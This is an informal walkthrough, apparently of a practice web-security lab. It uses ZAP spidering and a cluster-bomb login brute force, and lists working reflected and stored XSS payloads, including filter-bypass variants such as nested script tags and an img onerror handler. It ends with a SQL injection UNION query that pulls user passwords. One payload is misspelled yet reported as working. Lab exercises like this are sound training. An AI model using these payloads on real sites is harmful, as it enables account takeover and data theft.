to spider the web we can do a lot of things but lets use zapproxy bcs it is free and enter our target

now all is good lets begin and use spider tool bcs we only need to spider the website no need to automate test

use intruder cluster bomb type attack and put username wordlist or put names

put password wordlist or put passwords

and we can see here username admin and password lets try them

this is the xss reflected part

we will try simple injection
<scipt>alert("hacked")</scipt>

and yup we got it now make it medium

lets try
<SCRIPT>alert("hacked")</script>

yup we got it now lets make it high

we will try like
<img src=x onerror=alert("hacked")>

yup nice and we can see it worked

try
<script>alert("hacked")</script>
on message parameter

and we got it and now lets try same methodology on medium

try this
<scr<script>ipt>alert("hacked")</script>

we will try in the name parameter but make the length bigger

lets try in the reflected part to steal cookies

change the background color with
<script>document.body.style.backgroundColor='red';</script>

intercept it and send to repeater and try simple query but failed

lets try to see other things like passwords
1' UNION SELECT user, password FROM users #














